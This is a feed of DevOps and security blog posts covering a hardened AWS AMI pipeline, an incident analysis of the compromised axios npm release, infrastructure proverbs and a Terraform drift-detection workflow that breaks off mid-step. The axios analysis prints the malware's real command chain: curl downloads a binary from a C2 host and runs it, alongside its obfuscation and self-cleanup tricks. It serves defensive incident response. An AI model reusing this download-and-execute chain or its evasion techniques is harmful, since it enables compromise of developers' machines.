DEV Community: RoseSecurity

Building an AWS Image Factory with Packer and Terratest

RoseSecurity — Thu, 21 May 2026 18:37:22 +0000

Sorry I've been quiet lately. My head has been down on my newest adventure. I'm so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it's odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I've had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?

Here is my approach, the downfalls, the unknowns, and the fun parts. I apologize in advance that this is very GitLab centric CI/CD, but if you like the design, feel free to port it over to your source control system of choice.

Scaffolding

The repository starts with the boring stuff first, because the boring stuff is what keeps the project usable after the first week. Besides .gitignore and .gitattributes, there is a short README.md, a Brewfile for local tooling, an .editorconfig, a SECURITY.md, and the usual .gitlab/merge_request_templates and .gitlab/issue_templates so reviews and issues don't turn into archaeology.

A small Makefile covers common local commands, but .pre-commit-config.yaml does most of the early heavy lifting. It gives the repo one place for file hygiene, formatting checks, and basic guardrails before anything gets near CI. Here's the first pass of hooks for the Image Factory.

# See https://pre-commit.com for more information
# See https://pre-commit.com/hooks.html for more hooks
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v5.0.0
    hooks:
      - id: end-of-file-fixer
      - id: check-merge-conflict
      - id: trailing-whitespace
        args: [--markdown-linebreak-ext=md]
      - id: check-shebang-scripts-are-executable

      # YAML
      - id: check-yaml

      # Cross platform
      - id: check-case-conflict
      - id: mixed-line-ending
        args: [--fix=lf]

  - repo: local
    hooks:
      - id: packer-fmt
        name: Packer format check
        entry: packer fmt -check -recursive packer
        language: system
        files: ^packer/.*\.pkr\.hcl$
        pass_filenames: false

      - id: shellcheck
        name: ShellCheck
        entry: shellcheck
        language: system
        types: [shell]

That runs on every commit and removes a lot of pointless review noise. If Packer formatting or shell linting is broken, I want the hook to catch it before a reviewer has to.

Side note, I typically have a dedicated pre-commit CI job for making sure everything passes as a prerequisite to other pipelines.

The repo also has a docs directory for the usual odds and ends: architecture notes, decision records, and diagrams.

AWS Prerequisites

Before the repo can build anything useful, AWS needs a few pieces in place. If the AMIs use encrypted EBS volumes, the KMS key policy has to let the build account use the key and let consumer accounts launch from the shared AMIs. You also need the normal network plumbing: VPC, subnets, routing, security groups, and outbound access so temporary build and test instances can pull updates, download packages, reach SSM, and install whatever baseline tooling your organization requires.

An optional AMI reaper Lambda is worth adding early. Failed builds, superseded images, and half-finished experiments shouldn't live forever. If the pipeline tags images during build, test, and publish, cleanup can be driven from those tags instead of guessing (thank you boto3).

The last prerequisite is identity. Packer, Terratest, and publishing should each have an IAM role, and CI should use OIDC to assume those roles. Long-lived AWS keys in CI variables are one of those things that feel convenient right up until they become an incident, and they make me feel like I need a shower if I have to use them.

Codebase Structure

The layout is intentionally boring. Each image gets its own Packer root under packer/images/<provider>/<image>, and each root owns the same four files: versions.pkr.hcl, variables.pkr.hcl, sources.pkr.hcl, and build.pkr.hcl. When someone adds another operating system, the plugin versions, inputs, AMI lookup logic, and hardening steps all have a known place to live.

├── account-map.yaml
├── Brewfile
├── docs
├── Makefile
├── packer
│   ├── images
│   │   └── aws
│   │       ├── al2023
│   │       │   ├── build.pkr.hcl
│   │       │   ├── sources.pkr.hcl
│   │       │   ├── variables.pkr.hcl
│   │       │   └── versions.pkr.hcl
│   │       └── ubuntu24.04
│   │           ├── build.pkr.hcl
│   │           ├── sources.pkr.hcl
│   │           ├── variables.pkr.hcl
│   │           └── versions.pkr.hcl
├── README.md
├── scripts
│   ├── build.sh
│   └── gitlab
│       └── detect-packer-changes.sh
├── SECURITY.md
└── tests
    ├── terraform
    │   ├── main.tf
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── README.md
    │   ├── variables.tf
    │   └── versions.tf
    └── terratest
        ├── build_test.go
        ├── checks
        │   ├── al2023-cis-level1.yaml
        │   └── ubuntu24.04-cis-level1.yaml
        ├── go.mod
        └── go.sum

The other important root-level file is account-map.yaml. It lists the consumer AWS accounts that should receive launch permissions after an AMI passes testing. I prefer keeping that as data in the repo instead of hiding it in CI variables. A merge request should show exactly who is being added or removed from the distribution list.

Building the Image

The build wrapper stays small. It takes a Packer environment through PKR_ENV, initializes that image root, checks the template, and writes the final manifest into artifacts/. The local command and the CI command are the same thing, which makes build failures much easier to reproduce.

#!/usr/bin/env bash

set -euo pipefail

: "${PKR_ENV:? PKR_ENV is required}"
if ! command -v "packer" &>/dev/null; then
  echo "Error: Packer is not installed."
  exit 1
fi

echo "Initializing Packer environment in $PKR_ENV"
packer init "$PKR_ENV"

echo "Checking Packer configuration formatting..."
packer fmt -check "$PKR_ENV"

echo "Validating Packer configurations..."
packer validate "$PKR_ENV"

echo "Building Packer image..."
mkdir -p artifacts
packer build -on-error=cleanup "$PKR_ENV"

For AL2023, the Packer source starts by finding the base AMI, creating a timestamped name, and tagging the AMI and snapshots with enough metadata to make cleanup and audit work sane. Tags like ImageFactoryManaged, ImageFactoryPublished, BaseImageProduct, and SourceAmi give you a quick answer to what created the image, what it was based on, and whether it has been released.

locals {
  build_timestamp = regex_replace(timestamp(), "[- TZ:]", "")
  cis_product     = "CIS Hardened Image Level 1 on Amazon Linux 2023"

  ami_name = var.ami_name != "" ? var.ami_name : format(
    "%s-%s-%s",
    var.ami_name_prefix,
    var.cis_marketplace_version,
    local.build_timestamp,
  )

  common_tags = merge(
    {
      Name                  = local.ami_name
      BaseImageProduct      = local.cis_product
      BaseImageVersion      = var.cis_marketplace_version
      CisBenchmarkLevel     = "1"
      ImageFactoryManaged   = "true"
      ImageFactoryPublished = "false"
      SourceAmi             = data.amazon-ami.this.id
    },
    var.tags,
  )
}

data "amazon-ami" "this" {
  region      = var.aws_region
  owners      = var.source_ami_owners
  most_recent = var.source_ami_most_recent

  filters = merge(
    {
      architecture        = var.source_ami_architecture
      name                = var.source_ami_name_filter
      root-device-type    = "ebs"
      virtualization-type = "hvm"
    },
    var.source_ami_product_code != "" ? { product-code = var.source_ami_product_code } : {},
  )
}

The amazon-ebs source uses SSM Session Manager as the communicator. It sounds like a small choice, but it changes the operating model quite a bit. I don't need to punch SSH ingress into a build subnet, pass key pairs around, or explain why a temporary builder was reachable from the internet. The instance gets temporary SSM permissions, Packer connects through Session Manager, and the build network can stay private.

source "amazon-ebs" "al2023" {
  ami_description             = var.ami_description
  ami_name                    = local.ami_name
  ami_regions                 = var.ami_regions
  associate_public_ip_address = var.associate_public_ip_address
  encrypt_boot                = var.encrypt_boot
  instance_type               = var.instance_type
  kms_key_id                  = var.kms_key_id
  region                      = var.aws_region
  source_ami                  = data.amazon-ami.this.id

  communicator     = "ssh"
  pause_before_ssm = "30s"
  ssh_interface    = "session_manager"
  ssh_timeout      = var.ssh_timeout
  ssh_username     = var.ssh_username

  launch_block_device_mappings {
    delete_on_termination = true
    device_name           = "/dev/xvda"
    encrypted             = var.encrypt_boot
    kms_key_id            = var.kms_key_id
    volume_size           = var.root_volume_size
    volume_type           = var.root_volume_type
  }

  run_tags      = merge(local.common_tags, { ImageFactoryStage = "build" })
  snapshot_tags = local.common_tags
  tags          = local.common_tags
}

The hardening layer uses shell in this version because the first pass needed to stay readable and close to the AMI lifecycle. This is just an example baseline. In practice, you could start from an AWS Marketplace image that already comes hardened and layer your custom tooling on top. You could also move the hardening logic into Ansible if that fits your team better. The shape is the same either way: install the baseline agent, apply the deltas, enable the services, clean the machine, and seal it.

build {
  sources = ["source.amazon-ebs.al2023"]

  provisioner "shell" {
    inline_shebang = "/bin/bash -e"

    environment_vars = [
      "UPDATE_PACKAGES=${var.update_packages}",
    ]

    inline = [
      "set -euo pipefail",
      "if [ \"$UPDATE_PACKAGES\" = \"true\" ]; then sudo dnf update -y; fi",
      "if ! rpm -q amazon-ssm-agent >/dev/null 2>&1; then sudo dnf install -y amazon-ssm-agent; fi",
      "if ! rpm -q rsyslog >/dev/null 2>&1; then sudo dnf install -y rsyslog; fi",
      "printf '%s\\n' 'install cramfs /bin/false' 'blacklist cramfs' | sudo tee /etc/modprobe.d/cramfs.conf >/dev/null",
      "printf '%s\\n' 'net.ipv4.conf.all.accept_redirects = 0' 'net.ipv4.conf.default.accept_redirects = 0' | sudo tee /etc/sysctl.d/99-imagefactory-hardening.conf >/dev/null",
      "sudo sysctl -p /etc/sysctl.d/99-imagefactory-hardening.conf",
      "sudo mkdir -p /etc/ssh/sshd_config.d",
      "printf '%s\\n' 'PermitRootLogin no' 'PermitEmptyPasswords no' | sudo tee /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf >/dev/null",
      "sudo chmod 600 /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf",
      "printf '%s\\n' 'umask 027' | sudo tee /etc/profile.d/99-imagefactory-umask.sh >/dev/null",
      "sudo chmod 644 /etc/profile.d/99-imagefactory-umask.sh",
      "sudo systemctl enable --now amazon-ssm-agent",
      "sudo systemctl enable --now rsyslog",
      "sudo dnf clean all",
      "sudo cloud-init clean --logs",
      "sudo rm -f /etc/ssh/ssh_host_*",
    ]
  }

  post-processor "manifest" {
    output     = "artifacts/${var.ami_name_prefix}-manifest.json"
    strip_path = true
  }
}

The Ubuntu image follows the same pattern with apt, snap, a different username, and a different root device. AL2023 and Ubuntu aren't identical, but the repo shape is close enough that a reviewer can find the operating-system-specific differences quickly.

Build Pipelines

The parent pipeline has three stages: detect, dispatch, and secret detection. The detect job figures out which image roots changed, writes a small matrix artifact, and generates a child pipeline. The dispatch job starts that generated child pipeline. This keeps the parent pipeline fast without using a giant static matrix that rebuilds every image because one line changed in one Packer directory.

stages:
  - detect
  - dispatch
  - secret-detection

variables:
  SECRET_DETECTION_ENABLED: "true"
  PACKER_VERSION: "1.15.1"
  PACKER_BUILD_IMAGE: "amazonlinux:2023"
  AWS_REGION: "us-east-2"

include:
  - local: .gitlab/ci/detect/*.gitlab-ci.yml
  - local: .gitlab/ci/dispatch/*.gitlab-ci.yml
  - template: Security/Secret-Detection.gitlab-ci.yml

The change detector compares the base and head SHAs, walks changed files under packer/images/**, finds the nearest directory containing versions.pkr.hcl, and emits a child pipeline job for each changed image. The generated job forwards variables like PKR_ENV, PKR_IMAGE, and PKR_CHECKS_FILE, so one provider pipeline can handle many image directories without copy and paste.

find_packer_root() {
  path="$1"
  dir="${path%/*}"

  while [ "$dir" != "." ] && [ "$dir" != "packer/images" ]; do
    if [ -f "$dir/versions.pkr.hcl" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    dir="${dir%/*}"
  done

  return 1
}

checks_file() {
  case "$1" in
    al2023)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
    ubuntu24.04)
      printf 'checks/ubuntu24.04-cis-level1.yaml'
      ;;
    *)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
  esac
}

The AWS child pipeline is where the real lifecycle happens. It builds the AMI, extracts the Packer manifest, launches a test instance, runs hardening checks over SSM, and publishes only after those checks pass.

stages:
  - build
  - test
  - publish

packer:build:
  extends: .packer
  stage: build
  script:
    - ./scripts/build.sh
    - |
      manifest="$(find artifacts -type f -name '*-manifest.json' | sort | tail -n 1)"
      artifact_ids="$(jq -r '[.builds[] | select(.artifact_id != null and .artifact_id != "") | .artifact_id] | last // ""' "$manifest")"
      primary_artifact="${artifact_ids%%,*}"
      ami_region="${primary_artifact%%:*}"
      ami_id="${primary_artifact#*:}"
      ami_name="$(aws ec2 describe-images --region "$ami_region" --image-ids "$ami_id" --query 'Images[0].Name' --output text)"

      {
        printf 'AMI_ARTIFACT_IDS=%s\n' "$artifact_ids"
        printf 'AMI_REGION=%s\n' "$ami_region"
        printf 'AMI_ID=%s\n' "$ami_id"
        printf 'AMI_NAME=%s\n' "$ami_name"
      } > artifacts/packer.env
  artifacts:
    reports:
      dotenv: artifacts/packer.env
    paths:
      - artifacts/

terratest:ami:
  extends: .terratest
  stage: test
  needs:
    - job: packer:build
      artifacts: true
  script:
    - cd tests/terratest
    - go test -v -timeout 45m . -args -ami_name "$AMI_NAME" -checks_file "${PKR_CHECKS_FILE:-checks/al2023-cis-level1.yaml}"

The artifacts/packer.env file is the handoff between build and test. GitLab loads it as a dotenv report, so the test stage doesn't have to parse the Packer manifest again. It gets the AMI name from the previous job and uses that as the input for the Terratest fixture.

The other part I care about is authentication. The build and test jobs use GitLab OIDC to assume an AWS role. No long-lived AWS access keys in CI, no local credentials pasted into variables, and no mystery user showing up in CloudTrail. The job writes the GitLab OIDC token to a file, exports AWS_ROLE_ARN, and lets the AWS SDK credential chain handle the rest.

.packer:
  image:
    name: "$PACKER_BUILD_IMAGE"
    entrypoint: [""]
  id_tokens:
    AWS_OIDC_TOKEN:
      aud: "https://gitlab.com"
  variables:
    AWS_WEB_IDENTITY_TOKEN_FILE: "$CI_PROJECT_DIR/.aws/gitlab-oidc-token"
  before_script:
    - |
      : "${AWS_OIDC_TOKEN:?Missing GitLab AWS OIDC token.}"
      : "${AWS_PACKER_BUILD_OIDC_ROLE_ARN:?Missing AWS Packer build OIDC role ARN.}"

      mkdir -p "$CI_PROJECT_DIR/.aws"
      printf '%s' "$AWS_OIDC_TOKEN" > "$AWS_WEB_IDENTITY_TOKEN_FILE"
      export AWS_ROLE_ARN="$AWS_PACKER_BUILD_OIDC_ROLE_ARN"
      export AWS_ROLE_SESSION_NAME="gitlab-$CI_PROJECT_ID-$CI_PIPELINE_ID-$CI_JOB_ID"

Testing and Scanning AMIs

Building an AMI is not enough. The pipeline needs to boot the image and prove that the expected hardening controls are present on a running instance.

The test fixture launches one EC2 instance from the AMI name produced by Packer. It discovers the build VPC and subnets by tag, attaches a temporary SSM-capable instance profile when one is not provided, and avoids SSH entirely.

data "aws_ami" "test" {
  count = var.tests_enabled ? 1 : 0

  most_recent = true
  owners      = var.ami_owners

  filter {
    name   = "name"
    values = [var.ami_name]
  }

  filter {
    name   = "root-device-type"
    values = ["ebs"]
  }

  filter {
    name   = "virtualization-type"
    values = ["hvm"]
  }
}

resource "aws_instance" "test" {
  count = var.tests_enabled ? 1 : 0

  ami                         = one(data.aws_ami.test[*].id)
  instance_type               = var.instance_type
  subnet_id                   = sort(one(data.aws_subnets.test[*].ids))[0]
  vpc_security_group_ids      = var.security_group_ids != null ? var.security_group_ids : [one(aws_security_group.test[*].id)]
  iam_instance_profile        = var.iam_instance_profile != null ? var.iam_instance_profile : one(aws_iam_instance_profile.test[*].name)
  associate_public_ip_address = var.associate_public_ip_address

  tags = merge(
    var.tags,
    {
      Name = format("%s-test", var.ami_name)
    },
  )
}

The Go test loads a YAML file of hardening checks, waits for SSM to report that the instance is connected, and then runs each command through AWS-RunShellScript. A check passes when the command exits successfully and, when needed, stdout contains the expected value.

type hardeningCheck struct {
    ID                   string `yaml:"id"`
    Description          string `yaml:"description"`
    Command              string `yaml:"command"`
    ExpectStdoutContains string `yaml:"expect_stdout_contains,omitempty"`
}

func TestAMIHardeningChecks(t *testing.T) {
    t.Parallel()
    logger.Default = logger.Discard

    if *amiName == "" {
        t.Skip("ami_name flag must be set")
    }

    const tfDir = "../terraform"

    defer ts.RunTestStage(t, "destroy", func() {
        destroyTerraform(t, tfDir)
    })

    ts.RunTestStage(t, "deploy", func() {
        applyTerraform(t, tfDir)
    })

    ssmClient := aws.NewSsmClient(t, awsRegion)

    ts.RunTestStage(t, "validate", func() {
        validate(t, tfDir, ssmClient)
    })
}

The checks use plain YAML so security engineers can review them without having to read Go. Adding another assertion means updating the relevant checks file and letting the same test harness run it.

checks:
  - id: 1.1.1.1-cramfs-disabled
    description: cramfs filesystem module is disabled
    command: "! lsmod | grep -q cramfs && modprobe -n -v cramfs 2>&1 | grep -qE 'install /bin/(true|false)'"

  - id: 1.5.1-aslr-enabled
    description: kernel.randomize_va_space is set to 2 (full ASLR)
    command: "sysctl -n kernel.randomize_va_space"
    expect_stdout_contains: "2"

  - id: 5.2.6-ssh-root-login-disabled
    description: SSH PermitRootLogin is set to no
    command: "sshd -T 2>/dev/null | grep -i '^permitrootlogin' | awk '{print $2}'"
    expect_stdout_contains: "no"

The custom check format isn't mandatory. If a team doesn't want to maintain a separate validation harness, the same checks can move into Ansible validation playbooks. Ansible can use SSM to run checks on the temporary instance without opening SSH, which keeps the network model mostly the same while moving the assertions into a tool more operators already know. That is probably where this project goes over time.

This isn't a full substitute for every scanner or every benchmark. The wider program should still include vulnerability scanning, package inventory, and AWS Inspector coverage. These tests catch direct build regressions immediately: the service didn't start, the kernel setting didn't stick, the SSH drop-in didn't get read, or the baseline package never landed.

Tagging and Sharing Images

Publishing is gated to the default branch. Merge requests can build and test, but they don't share AMIs to the organization. Once a default-branch build passes, the publish job tags the image as published and grants launch permissions to each account in account-map.yaml.

publish:ami:
  extends: .terratest
  stage: publish
  needs:
    - job: packer:build
      artifacts: true
    - job: terratest:ami
  script:
    - |
      published_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
      account_ids="$(sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" account-map.yaml)"

      if [ -z "$account_ids" ]; then
        printf 'No AWS account IDs found in account-map.yaml.\n' >&2
        exit 1
      fi

      for artifact in $(printf '%s' "$AMI_ARTIFACT_IDS" | tr ',' ' '); do
        ami_region="${artifact%%:*}"
        ami_id="${artifact#*:}"

        aws ec2 create-tags \
          --region "$ami_region" \
          --resources "$ami_id" \
          --tags \
            Key=ImageFactoryPublished,Value=true \
            Key=ImageFactoryPublishedAt,Value="$published_at"

        for account_id in $account_ids; do
          aws ec2 modify-image-attribute \
            --region "$ami_region" \
            --image-id "$ami_id" \
            --launch-permission "Add=[{UserId=$account_id}]"
        done
      done
  rules:
    - if: '$CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH'

The operational details matter here. The job reads artifact IDs from the Packer manifest instead of assuming one region. It tags the AMI after tests pass, not before. It fails closed if the account map is empty. Those small choices make the release process repeatable without someone babysitting every run.

Tradeoffs and Unknowns

The main tradeoff is time. Building an AMI, booting it, waiting for SSM, running checks, and cleaning everything up is slower than normal application CI. The change-detection pipeline keeps the cost down by rebuilding only affected images. The boot test is still worth it when the alternative is distributing a broken base image to dozens of accounts.

Benchmark drift needs active ownership. CIS guidance, Marketplace images, distro defaults, and security agents all change. The validation checks should live beside the image definition so every hardening change can be reviewed with the matching test change.

Marketplace image handling has its own operational messiness. Product codes, owner IDs, naming patterns, and regional availability are all things you have to test in a real AWS account. Parameterizing the inputs helps, but it doesn't remove the fact that AWS Marketplace images aren't always as smooth as a vanilla owner-and-name AMI lookup.

Finally, AMI sharing is only part of distribution. Consumers still need a sane way to discover the latest approved AMI, whether that is through tags, SSM parameters, Service Catalog, Terraform data sources, or an internal platform workflow. Sharing the image makes it available. It doesn't automatically make every team use it correctly.

Wrapping Up

An image factory isn't a compliance shortcut. It is a controlled path for choosing a trusted base, applying organization-specific deltas, testing the running result, and sharing the AMI only after the pipeline proves it is ready.

That's the real goal: turn "please use the hardened image" from a slide deck request into something teams can actually use.

If you liked (or hated) this blog, feel free to check out my GitHub!

Welcome to Transitive Dependency Hell

RoseSecurity — Tue, 31 Mar 2026 21:59:46 +0000

At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.

Monday Night

A developer sits down, opens a terminal, and runs a command they've run dozens of times before:

npx --yes @datadog/datadog-ci --help

A legitimate tool from a legitimate vendor. The --yes flag skips npm's confirmation prompt. The developer (or Claude) isn't even using the tool yet, just checking its options.

npm resolves the dependency tree and starts writing packages to disk: dogapi, escodegen, esprima, js-yaml, fast-xml-parser, rc, is-docker, semver, uuid, and axios. All names you'd recognize, and all packages that individually look fine. But axios just resolved to 1.14.1, which is not the version that Axios's maintainers published four days earlier. It's the version an attacker published twenty minutes ago.

The Hijack

axios@1.14.0 was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of jasonsaayman, an existing Axios maintainer, and changed the account email from jasonsaayman@gmail.com to ifstap@proton.me. With publish access, they pushed two malicious versions in quick succession:

00:21:58 UTC: axios@1.14.1, tagged latest
01:00:57 UTC: axios@0.30.4, tagged legacy

The latest tag meant every unversioned axios install worldwide pulled the backdoor. The legacy tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: plain-crypto-js.

The Postinstall Chain

plain-crypto-js declared postinstall: node setup.js in its package.json, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with OrDeR_7077) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.

On the developer's Mac, CrowdStrike's process tree captured the full chain. npx spawned node setup.js, which shelled out to /bin/sh to launch osascript against a script dropped into the per-user temp directory:

nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033

osascript is Apple's AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The nohup ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:

sh -c 'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       && chmod 770 /Library/Caches/com.apple.act.mond \
       && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \
  &> /dev/null

Download, set executable, and launch the beacon, all in a single sh -c invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.

The output path masquerades as an Apple system daemon using the com.apple.* reverse-DNS convention. The -d packages.npm.org/product0 is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The -s flag keeps curl silent, and the outer &> /dev/null swallows any output from the entire chain.

The binary immediately began beaconing to 142.11.206.73:8000 (sfrclak.com) over HTTP. Ten hours later, CrowdStrike's telemetry shows com.apple.act.mond still running and reading /Library/Preferences/com.apple.networkd.plist for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you're deciding whether a machine is worth keeping access to.

Meanwhile, back in node_modules, setup.js was cleaning up after itself. It deleted its own file with fs.unlink(__filename) and renamed a clean package.md to package.json, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.

Not Just Macs

The same setup.js had branches for every major platform:

Platform	Payload Path	Technique
macOS	`/Library/Caches/com.apple.act.mond`	AppleScript, curl, binary masquerading as Apple daemon
Windows	`%PROGRAMDATA%\wt.exe`	PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops `.ps1` payload with `-w hidden -ep bypass`
Linux	`/tmp/ld.py`	Python script downloaded and backgrounded with `nohup python3`

All three phoned home to the same C2: sfrclak.com:8000/6202033.

What CrowdStrike Caught (and Didn't)

Falcon flagged the macOS beacon as MacOSApplicationLayerProtocol, mapping to T1071 (Application Layer Protocol) under TA0011 (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.

Everything before that ran unimpeded. The node setup.js postinstall hook, the osascript execution from a temp directory, the curl download and chmod all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.

IOCs

Indicator	Type	Value
C2 Domain	Domain	`sfrclak.com`
C2 IP	IPv4	`142.11.206.73`
C2 Port	Port	`8000`
Campaign ID	String	`6202033`
macOS Payload	File	`/Library/Caches/com.apple.act.mond`
macOS Hash	SHA256	`92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a`
Windows Payload	File	`%PROGRAMDATA%\wt.exe`
Linux Payload	File	`/tmp/ld.py`
Tracking ID	String	`packages.npm.org/product0`
Compromised Packages	npm	`axios@1.14.1`, `axios@0.30.4`, `plain-crypto-js@4.2.0-4.2.1`
Hijacked Account	npm	`jasonsaayman` (email changed to `ifstap@proton.me`)
XOR Key	String	`OrDeR_7077`

Takeaways

Check your lockfiles now. Search package-lock.json, yarn.lock, and pnpm-lock.yaml for axios@1.14.1, axios@0.30.4, or any reference to plain-crypto-js. If you find them, assume the installing machine is compromised.

Disable postinstall scripts. Add ignore-scripts=true to ~/.npmrc. When a package legitimately needs a postinstall hook for native compilation, run npm rebuild <package> explicitly after reviewing the script. This single setting would have stopped the entire attack chain.

Monitor for osascript spawned by node. There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.

The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm's default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every npm install into an implicit trust decision across hundreds of packages maintained by people you've never met. The Axios maintainer account was compromised for three hours. That was enough.

This is the third post in a series on software supply chain attacks. The previous posts covered the Trivy ecosystem compromise and the limits of SHA pinning. Joe Desimone's technical analysis of the axios compromise is worth reading in full.

If you liked (or hated) this blog, feel free to check out my GitHub!

Infra Proverbs

RoseSecurity — Thu, 18 Dec 2025 15:48:15 +0000

Simple, Clear, Maintainable

Clear is better than clever.

Automate the toil, not the thinking.

If you can't see it, you can't fix it.

Serve the workload, not the infrastructure.

Today's shortcut is tomorrow's incident.

An untested backup is no backup at all.

Roll out in waves, not floods.

Hope is not a strategy.

Be careful what you measure, because that's exactly what you'll get.

The best postmortem is the one you act on.

Tribal knowledge dies with the tribe.

The best infrastructure is the kind you can forget about.

Terraform Drift Detection Powered by GitHub Actions

RoseSecurity — Wed, 17 Dec 2025 18:08:25 +0000

TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.

The Problem

Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. RIP driftctl

The Simplicity of GitHub Actions

I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform's built-in exit codes and GitHub's issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I'll talk about that below).

The Workflow

Triggers and Permissions

The workflow runs on a daily schedule and supports manual execution via workflow_dispatch. We configure OIDC (id-token: write) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.

name: Terraform Drift Detection

# We can also add some fancy logic to extract this from a Dockerfile
# or versions.tf so we don't have to continually monitor and bump this.
env:
  TF_VERSION: 1.X.X

on:
  workflow_dispatch:
  schedule:
    - cron: "00 6 * * *" # Every day at 06:00 UTC

permissions:
  # This is required for requesting the JWT and opening issues
  id-token: write
  contents: read
  pull-requests: write
  issues: write

Finding Root Modules

This job dynamically discovers all Terraform root modules in the repository by searching for .tf files while excluding module subdirectories and Terraform's cache. The find command output is transformed into a JSON array using jq, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run terraform plan against.

jobs:
  find-terraform-envs:
    name: 'Find Terraform Directories'
    runs-on: ubuntu-latest
    outputs:
      terraform-envs: ${{ steps.fetch-environments.outputs.dirs }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Fetch Environments
        id: fetch-environments
        run: |
          # Create a matrix of Terraform root modules
          DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')
          echo "dirs=$DIRS" >> "$GITHUB_OUTPUT"
          echo "Found environments: $DIRS"

Credential Configuration and Setup

The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with fail-fast: false to ensure one environment's failure doesn't block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with terraform_wrapper: false to ensure clean exit code propagation. The OIDC in AWS takes some additional setup for this to work, but it's the recommended approach for secure, keyless authentication.

  drift-detection:
    name: 'Drift Detection'
    runs-on: ubuntu-latest
    needs: find-terraform-envs
    if: needs.find-terraform-envs.outputs.terraform-envs != '[]'
    strategy:
      fail-fast: false
      matrix:
        tf_dir: ${{ fromJson(needs.find-terraform-envs.outputs.terraform-envs) }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4.1.0
        with:
          aws-region: us-east-1
          role-to-assume: ${{ secrets.AWS_ROLE }}
          role-session-name: Drift_Detection

      - name: Set up Terraform
        uses: hashicorp/setup-terraform@v3.1.2
        with:
          terraform_version: ${{ env.TF_VERSION }}
          terraform_wrapper: false

      - name: Terraform Init
        working-directory: ${{ matrix.tf_dir }}
        run: terraform init -input=false

Detecting Drift

This is the core drift detection mechanism. The terraform plan -detailed-exitcode returns exit codes: 0 (no changes), 1 (error), or 2 (drift detected). We capture the actual Terraform exit code using ${PIPESTATUS[0]} rather than $?, which would only return sed's exit code. The plan output is filtered and saved for issue creation.

Technical Note: We use set +e to prevent immediate failure, -input=false to prevent hanging on interactive prompts, and -lock-timeout=5m to handle state locks gracefully.

      - name: Terraform Drift Detection Plan
        id: plan
        working-directory: ${{ matrix.tf_dir }}
        shell: bash
        run: |
          set +e # Disable exit on error for this step
          terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2>&1 | sed -n '/Terraform will perform the following actions:/,$p' > plan_output.txt
          EXIT_CODE=${PIPESTATUS[0]}
          echo "exit_code=$EXIT_CODE" >> "$GITHUB_OUTPUT"
          echo "EXIT_CODE=$EXIT_CODE" >> "$GITHUB_ENV"

          # Show the plan output
          cat plan_output.txt

          # Set drift detected flag
